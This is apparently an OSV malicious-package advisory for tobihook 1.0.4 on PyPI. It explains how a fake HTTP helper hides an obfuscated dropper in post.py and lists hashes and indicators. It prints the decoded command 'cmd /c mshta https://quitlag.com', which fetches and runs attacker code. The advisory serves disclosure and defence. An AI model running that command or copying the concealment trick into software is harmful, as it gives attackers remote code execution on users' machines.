{"id":"MAL-2026-5995","summary":"Malicious code in tobihook (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb)\nThe package masquerades as an HTTP helper (functions named post/get/fetch, module comment '# request/__init__.py', and an unused requests dependency) but each of those functions base64-decodes the string 'cmd /c mshta https://quitlag.com' and launches it via subprocess.Popen with CREATE_NO_WINDOW on Windows. mshta.exe then fetches and executes attacker-controlled HTA/JavaScript from quitlag.com on the caller's machine with no visible window. The malicious code is concealed in tobihook/post.py behind roughly 400 lines of leading whitespace and base64 obfuscation, and the dropper is reachable from the package's documented top-level API (tobihook/__init__.py re-exports post). Any developer who installs tobihook and calls its advertised post()/get()/fetch() triggers remote code execution on a Windows host.\n\n## Source: kam193 (052494dbc6267dbb289d7f0459188ecce627e3c3eb1d7a8892795003ff8bff53)\nCode contains lightly obfuscated commands executing remote scripts using mshta utility. The code does not contain any different functionality and the target URL is already flagged as potentially dangerous.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-tobihook\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote malicious script.\n\n\n - tool:mshta\n\n\n - obfuscation\n","modified":"2026-06-17T11:45:59.613670367Z","published":"2026-06-17T04:22:21Z","database_specific":{"iocs":{"urls":["https://quitlag.com"],"domains":["quitlag.com"]},"malicious-packages-origins":[{"versions":["1.0.4"],"import_time":"2026-06-17T05:45:42.031525513Z","source":"amazon-inspector","id":"IN-MAL-2026-006881","modified_time":"2026-06-17T04:22:21Z","sha256":"2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb"},{"versions":["1.0.4"],"import_time":"2026-06-17T11:38:57.758257846Z","source":"kam193","id":"pypi/2026-06-tobihook/tobihook","modified_time":"2026-06-17T09:32:21.283072Z","sha256":"052494dbc6267dbb289d7f0459188ecce627e3c3eb1d7a8892795003ff8bff53"}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/tobihook/1.0.4/"},{"type":"WEB","url":"https://urlscan.io/result/019ea71c-9937-7139-a2f7-8ede7361bd72/"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/tobihook"}],"affected":[{"package":{"name":"tobihook","ecosystem":"PyPI","purl":"pkg:pypi/tobihook"},"versions":["1.0.4"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"md5":"c6e1aadfd1e5600b697e835c64398ed5","blake2b_256":"596f2c5ff209e5e7edf7117cfb076ac5509d90e2df79f195f856cf638862df61","sha256":"51936e8835e6f0501d7e2aa6b1e4d44bfa1c273dd030bc469f52354f26de88fa"},"filename":"tobihook-1.0.4-py3-none-any.whl"},{"hashes":{"md5":"c8c5236ca6ad0adb8cc9dc9d8855ef7d","blake2b_256":"26d20b14018d25c92b3eda5babd8dc4281ff86ddeca752dd90f2fa3ebb0fc3c8","sha256":"1059215361577e38a8ad04b98c56aac494c93a52714e8a512cfac7c0f008c443"},"filename":"tobihook-1.0.4.tar.gz"}],"evidence_files":[{"tlsh":"9931f48fe32b478843a308af2009ac72d7d70405d3222986fb1d97a02f09464a43e87d","sha256":"447e5ecc54a7119c09666ecfdbf02d6ce944ee370baa06ef9f2a704302c32d58","path":"tobihook/post.py"},{"tlsh":"9790024e4467760be2644084052107100929a4307f2014783004a5ac63466140410108","sha256":"afb179d86f84de6d45ef4944dbf13ede041dcca7bcdb71d47df340ea7579a198","path":"tobihook/__init__.py"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/tobihook/MAL-2026-5995.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"ANALYST"}]}